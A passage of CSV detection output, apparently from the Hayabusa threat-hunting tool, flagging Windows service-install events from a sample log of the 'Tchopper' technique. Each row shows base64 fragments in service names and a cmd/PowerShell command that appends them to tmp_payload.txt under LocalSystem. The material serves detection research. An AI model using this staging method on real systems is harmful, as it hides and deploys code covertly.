tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:31.297 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:37.081 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
